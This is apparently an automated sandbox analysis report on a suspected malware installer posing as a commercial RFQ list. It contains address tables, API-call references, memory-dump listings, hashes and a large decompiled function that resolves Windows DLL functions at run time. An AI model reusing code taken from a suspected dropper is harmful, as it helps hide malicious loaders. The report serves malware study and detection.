                                                                                                                                                                                  0x00404430
                                                                                                                                                                                  0x0040439b
                                                                                                                                                                                  0x004043a8
                                                                                                                                                                                  0x004043b1
                                                                                                                                                                                  0x004043be
                                                                                                                                                                                  0x004043be
                                                                                                                                                                                  0x004043c5
                                                                                                                                                                                  0x004043cb
                                                                                                                                                                                  0x004043d4
                                                                                                                                                                                  0x004043d7
                                                                                                                                                                                  0x004043da
                                                                                                                                                                                  0x004043e2
                                                                                                                                                                                  0x004043e5
                                                                                                                                                                                  0x004043e8
                                                                                                                                                                                  0x004043ee
                                                                                                                                                                                  0x004043f5
                                                                                                                                                                                  0x004043fc
                                                                                                                                                                                  0x0040468e
                                                                                                                                                                                  0x004046a0
                                                                                                                                                                                  0x00404402
                                                                                                                                                                                  0x00404405
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404405
                                                                                                                                                                                  0x004043fc

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                                                                                                  • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                                                                                                  • lstrcmpiA.KERNEL32(Call,Baptistisk Setup: Installing), ref: 004044B9
                                                                                                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 004044C5
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                                                                                                    • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                                                                                    • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                                                                                    • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,?,00428838,?,?,000003FB,?), ref: 00404595
                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                                                                                                    • Part of subcall function 00404709: lstrlenA.KERNEL32(Baptistisk Setup: Installing,Baptistisk Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                                                                                    • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                                                                                                    • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Baptistisk Setup: Installing), ref: 004047C2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                  • String ID: 7580360$A$Baptistisk Setup: Installing$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc$Call
                                                                                                                                                                                  • API String ID: 2624150263-2098842433
                                                                                                                                                                                  • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                                                                                  • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                  			E10001A5D() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t198;
				signed int _t201;
				void* _t203;
				void* _t205;
				CHAR* _t207;
				void* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t219;
				signed short _t221;
				struct HINSTANCE__* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				char* _t228;
				void* _t239;
				signed char _t240;
				signed int _t241;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				signed int _t258;
				void* _t259;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed char _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed char _t307;
				signed int _t308;
				CHAR* _t309;
				CHAR* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				void* _t315;
				signed int _t316;
				void* _t317;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t317 = 0;
				_v48 = 0;
				_t198 = E10001215();
				_v24 = _t198;
				_v28 = _t198;
				_v44 = E10001215();
				_t308 = E1000123B();
				_v52 = _t308;
				_v12 = _t308;
				while(1) {
					_t201 = _v32;
					_v56 = _t201;
					if(_t201 != _t283 && _t317 == _t283) {
						break;
					}
					_t307 =  *_t308;
					_t286 = _t307;
					_t203 = _t286 - _t283;
					if(_t203 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t205 = _v56 - _t283;
						if(_t205 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t317 - _t283;
							if(_t317 == _t283) {
								_t317 = GlobalAlloc(0x40, 0x14a4);
								 *(_t317 + 0x810) = _t283;
								 *(_t317 + 0x814) = _t283;
							}
							_t287 = _v36;
							_t43 = _t317 + 8; // 0x8
							_t207 = _t43;
							_t44 = _t317 + 0x408; // 0x408
							_t309 = _t44;
							 *_t317 = _t287;
							 *_t207 =  *_t207 & 0x00000000;
							 *(_t317 + 0x808) = _t283;
							 *_t309 =  *_t309 & 0x00000000;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *(_t317 + 0x80c) = _t283;
							 *(_t317 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t315 = 0;
								GlobalFree(_t317);
								_t317 = E100012FE(_v24);
								__eflags = _t317 - _t283;
								if(_t317 == _t283) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t239 =  *(_t317 + 0x14a0);
									__eflags = _t239 - _t283;
									if(_t239 == _t283) {
										break;
									}
									_t315 = _t317;
									_t317 = _t239;
									__eflags = _t317 - _t283;
									if(_t317 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t315 - _t283;
								if(_t315 != _t283) {
									 *(_t315 + 0x14a0) = _t283;
								}
								_t240 =  *(_t317 + 0x810);
								__eflags = _t240 & 0x00000008;
								if((_t240 & 0x00000008) == 0) {
									_t241 = _t240 | 0x00000002;
									__eflags = _t241;
									 *(_t317 + 0x810) = _t241;
								} else {
									_t317 = E10001534(_t317);
									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L28:
									lstrcpyA(_t207, _v44);
									L29:
									lstrcpyA(_t309, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t308 = _v12;
										continue;
									}
									break;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L29;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t205 != 1) {
							goto L39;
						}
						_t247 = _v16;
						if(_v40 == _t283) {
							_t247 = _t247 - 1;
						}
						 *(_t317 + 0x814) = _t247;
						goto L39;
					}
					_t248 = _t203 - 0x23;
					if(_t248 == 0) {
						__eflags = _t308 - _v52;
						if(_t308 <= _v52) {
							L15:
							_v32 = _t283;
							_v36 = _t283;
							goto L17;
						}
						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
						if( *((char*)(_t308 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							L40:
							_t250 = _v32 - _t283;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t307 - 0x2a;
								if(_t307 == 0x2a) {
									_v36 = 2;
									L61:
									_t308 = _v12;
									_v28 = _v24;
									_t283 = 0;
									__eflags = 0;
									L62:
									_t316 = _t308 + 1;
									__eflags = _t316;
									_v12 = _t316;
									goto L63;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 == 0x2d) {
									L132:
									_t252 = _t308 + 1;
									__eflags =  *_t252 - 0x3e;
									if( *_t252 != 0x3e) {
										L134:
										_t252 = _t308 + 1;
										__eflags =  *_t252 - 0x3a;
										if( *_t252 != 0x3a) {
											L141:
											_v28 =  &(_v28[1]);
											 *_v28 = _t307;
											goto L62;
										}
										__eflags = _t307 - 0x2d;
										if(_t307 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t252;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L61;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t307 - 0x3a;
								if(_t307 != 0x3a) {
									goto L141;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 != 0x2d) {
									goto L134;
								}
								goto L132;
							}
							_t258 = _t250 - 1;
							__eflags = _t258;
							if(_t258 == 0) {
								L74:
								_t259 = _t286 - 0x22;
								__eflags = _t259 - 0x55;
								if(_t259 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											L115:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L120:
												 *__eax =  *__eax & 0x00000000;
												__ebx = E10001224(_v24);
												goto L91;
											}
											L116:
											__eflags = __cl;
											if(__cl == 0) {
												goto L120;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 1;
										__ebx = E10001215();
										 &_v12 = E100019FB( &_v12);
										__eax = E10001429(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x818) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x828) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E100019FB( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t133 = _v16 + 0x41; // 0x41
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t261 =  *(_t317 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x82c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x830; // 0x830
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t262 = _t258 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t283;
								goto L74;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L141;
							}
							_t265 = _t286 - 0x21;
							__eflags = _t265;
							if(_t265 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t266 = _t265 - 0x42;
							__eflags = _t266;
							if(_t266 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t317 + 0x810;
									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t271 = _t266;
							__eflags = _t271;
							if(_t271 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t272 = _t271 - 9;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(8);
								goto L56;
							}
							_t273 = _t272 - 4;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(4);
								goto L56;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t274 != 0;
							if(_t274 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t277 = _t248 - 5;
					if(_t277 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t283;
						_v20 = _t283;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t283;
						goto L17;
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						_v32 = 2;
						_v8 = _t283;
						_v20 = _t283;
						goto L17;
					}
					if(_t281 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
					L161:
					return _t317;
				} else {
					_t215 =  *_t317 - 1;
					if(_t215 == 0) {
						_t178 = _t317 + 8; // 0x8
						_t311 = _t178;
						__eflags =  *_t311;
						if( *_t311 != 0) {
							_t216 = GetModuleHandleA(_t311);
							__eflags = _t216 - _t283;
							 *(_t317 + 0x808) = _t216;
							if(_t216 != _t283) {
								L150:
								_t183 = _t317 + 0x408; // 0x408
								_t312 = _t183;
								_t217 = E100015A4( *(_t317 + 0x808), _t312);
								__eflags = _t217 - _t283;
								 *(_t317 + 0x80c) = _t217;
								if(_t217 == _t283) {
									__eflags =  *_t312 - 0x23;
									if( *_t312 == 0x23) {
										_t186 = _t317 + 0x409; // 0x409
										_t221 = E100012FE(_t186);
										__eflags = _t221 - _t283;
										if(_t221 != _t283) {
											__eflags = _t221 & 0xffff0000;
											if((_t221 & 0xffff0000) == 0) {
												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t283;
								if(_v48 != _t283) {
									L157:
									_t312[lstrlenA(_t312)] = 0x41;
									_t219 = E100015A4( *(_t317 + 0x808), _t312);
									__eflags = _t219 - _t283;
									if(_t219 != _t283) {
										L145:
										 *(_t317 + 0x80c) = _t219;
										goto L161;
									}
									__eflags =  *(_t317 + 0x80c) - _t283;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t196 = _t317 + 4;
									 *_t196 =  *(_t317 + 4) | 0xffffffff;
									__eflags =  *_t196;
									goto L161;
								} else {
									__eflags =  *(_t317 + 0x80c) - _t283;
									if( *(_t317 + 0x80c) != _t283) {
										goto L161;
									}
									goto L157;
								}
							}
							_t224 = LoadLibraryA(_t311);
							__eflags = _t224 - _t283;
							 *(_t317 + 0x808) = _t224;
							if(_t224 == _t283) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t317 + 0x408; // 0x408
						_t226 = E100012FE(_t179);
						 *(_t317 + 0x80c) = _t226;
						__eflags = _t226 - _t283;
						goto L159;
					}
					_t227 = _t215 - 1;
					if(_t227 == 0) {
						_t176 = _t317 + 0x408; // 0x408
						_t228 = _t176;
						__eflags =  *_t228;
						if( *_t228 == 0) {
							goto L161;
						}
						_t219 = E100012FE(_t228);
						L144:
						goto L145;
					}
					if(_t227 != 1) {
						goto L161;
					}
					_t80 = _t317 + 8; // 0x8
					_t284 = _t80;
					_t313 = E100012FE(_t80);
					 *(_t317 + 0x808) = _t313;
					if(_t313 == 0) {
						goto L160;
					}
					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x848)) = 1;
					 *((intOrPtr*)(_t317 + 0x838)) = 1;
					_t89 = _t317 + 0x408; // 0x408
					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
					goto L144;
				}
			}































































                                                                                                                                                                                  0x10001a65
                                                                                                                                                                                  0x10001a68
                                                                                                                                                                                  0x10001a6b
                                                                                                                                                                                  0x10001a6e
                                                                                                                                                                                  0x10001a71
                                                                                                                                                                                  0x10001a74
                                                                                                                                                                                  0x10001a77
                                                                                                                                                                                  0x10001a79
                                                                                                                                                                                  0x10001a7c
                                                                                                                                                                                  0x10001a81
                                                                                                                                                                                  0x10001a84
                                                                                                                                                                                  0x10001a8c
                                                                                                                                                                                  0x10001a94
                                                                                                                                                                                  0x10001a96
                                                                                                                                                                                  0x10001a99
                                                                                                                                                                                  0x10001aa1
                                                                                                                                                                                  0x10001aa1
                                                                                                                                                                                  0x10001aa6
                                                                                                                                                                                  0x10001aa9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ab3
                                                                                                                                                                                  0x10001ab5
                                                                                                                                                                                  0x10001aba
                                                                                                                                                                                  0x10001abc
                                                                                                                                                                                  0x10001b2e
                                                                                                                                                                                  0x10001b2e
                                                                                                                                                                                  0x10001b2e
                                                                                                                                                                                  0x10001b32
                                                                                                                                                                                  0x10001b35
                                                                                                                                                                                  0x10001b37
                                                                                                                                                                                  0x10001b59
                                                                                                                                                                                  0x10001b5c
                                                                                                                                                                                  0x10001b5e
                                                                                                                                                                                  0x10001b6d
                                                                                                                                                                                  0x10001b6f
                                                                                                                                                                                  0x10001b75
                                                                                                                                                                                  0x10001b75
                                                                                                                                                                                  0x10001b7b
                                                                                                                                                                                  0x10001b7e
                                                                                                                                                                                  0x10001b7e
                                                                                                                                                                                  0x10001b81
                                                                                                                                                                                  0x10001b81
                                                                                                                                                                                  0x10001b87
                                                                                                                                                                                  0x10001b89
                                                                                                                                                                                  0x10001b8c
                                                                                                                                                                                  0x10001b92
                                                                                                                                                                                  0x10001b95
                                                                                                                                                                                  0x10001b95
                                                                                                                                                                                  0x10001b97
                                                                                                                                                                                  0x10001b9d
                                                                                                                                                                                  0x10001ba0
                                                                                                                                                                                  0x10001bc4
                                                                                                                                                                                  0x10001bc7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001bca
                                                                                                                                                                                  0x10001bcc
                                                                                                                                                                                  0x10001bda
                                                                                                                                                                                  0x10001bdd
                                                                                                                                                                                  0x10001bdf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001be1
                                                                                                                                                                                  0x10001be1
                                                                                                                                                                                  0x10001be1
                                                                                                                                                                                  0x10001be7
                                                                                                                                                                                  0x10001be9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001beb
                                                                                                                                                                                  0x10001bed
                                                                                                                                                                                  0x10001bef
                                                                                                                                                                                  0x10001bf1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001bf1
                                                                                                                                                                                  0x10001bf3
                                                                                                                                                                                  0x10001bf5
                                                                                                                                                                                  0x10001bf7
                                                                                                                                                                                  0x10001bf7
                                                                                                                                                                                  0x10001bfd
                                                                                                                                                                                  0x10001c03
                                                                                                                                                                                  0x10001c05
                                                                                                                                                                                  0x10001c19
                                                                                                                                                                                  0x10001c19
                                                                                                                                                                                  0x10001c1b
                                                                                                                                                                                  0x10001c07
                                                                                                                                                                                  0x10001c0d
                                                                                                                                                                                  0x10001c10
                                                                                                                                                                                  0x10001c10
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ba2
                                                                                                                                                                                  0x10001ba2
                                                                                                                                                                                  0x10001ba2
                                                                                                                                                                                  0x10001ba3
                                                                                                                                                                                  0x10001bab
                                                                                                                                                                                  0x10001baf
                                                                                                                                                                                  0x10001bb5
                                                                                                                                                                                  0x10001bb9
                                                                                                                                                                                  0x10001c21
                                                                                                                                                                                  0x10001c24
                                                                                                                                                                                  0x10001c27
                                                                                                                                                                                  0x10001cb1
                                                                                                                                                                                  0x10001cb5
                                                                                                                                                                                  0x10001a9e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001a9e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001cb5
                                                                                                                                                                                  0x10001ba5
                                                                                                                                                                                  0x10001ba5
                                                                                                                                                                                  0x10001ba6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ba8
                                                                                                                                                                                  0x10001ba9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ba9
                                                                                                                                                                                  0x10001ba0
                                                                                                                                                                                  0x10001b3a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b43
                                                                                                                                                                                  0x10001b46
                                                                                                                                                                                  0x10001b53
                                                                                                                                                                                  0x10001b53
                                                                                                                                                                                  0x10001b48
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b48
                                                                                                                                                                                  0x10001abe
                                                                                                                                                                                  0x10001ac1
                                                                                                                                                                                  0x10001b12
                                                                                                                                                                                  0x10001b15
                                                                                                                                                                                  0x10001b26
                                                                                                                                                                                  0x10001b26
                                                                                                                                                                                  0x10001b29
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b29
                                                                                                                                                                                  0x10001b17
                                                                                                                                                                                  0x10001b1b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001b1d
                                                                                                                                                                                  0x10001b20
                                                                                                                                                                                  0x10001c2f
                                                                                                                                                                                  0x10001c32
                                                                                                                                                                                  0x10001c32
                                                                                                                                                                                  0x10001c34
                                                                                                                                                                                  0x10001f7a
                                                                                                                                                                                  0x10001f7d
                                                                                                                                                                                  0x10001fe0
                                                                                                                                                                                  0x10001ca2
                                                                                                                                                                                  0x10001ca5
                                                                                                                                                                                  0x10001ca8
                                                                                                                                                                                  0x10001cab
                                                                                                                                                                                  0x10001cab
                                                                                                                                                                                  0x10001cad
                                                                                                                                                                                  0x10001cad
                                                                                                                                                                                  0x10001cad
                                                                                                                                                                                  0x10001cae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001cae
                                                                                                                                                                                  0x10001f7f
                                                                                                                                                                                  0x10001f82
                                                                                                                                                                                  0x10001f8e
                                                                                                                                                                                  0x10001f8e
                                                                                                                                                                                  0x10001f91
                                                                                                                                                                                  0x10001f94
                                                                                                                                                                                  0x10001f9f
                                                                                                                                                                                  0x10001f9f
                                                                                                                                                                                  0x10001fa2
                                                                                                                                                                                  0x10001fa5
                                                                                                                                                                                  0x10001fec
                                                                                                                                                                                  0x10001fef
                                                                                                                                                                                  0x10001ff2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10001ff2
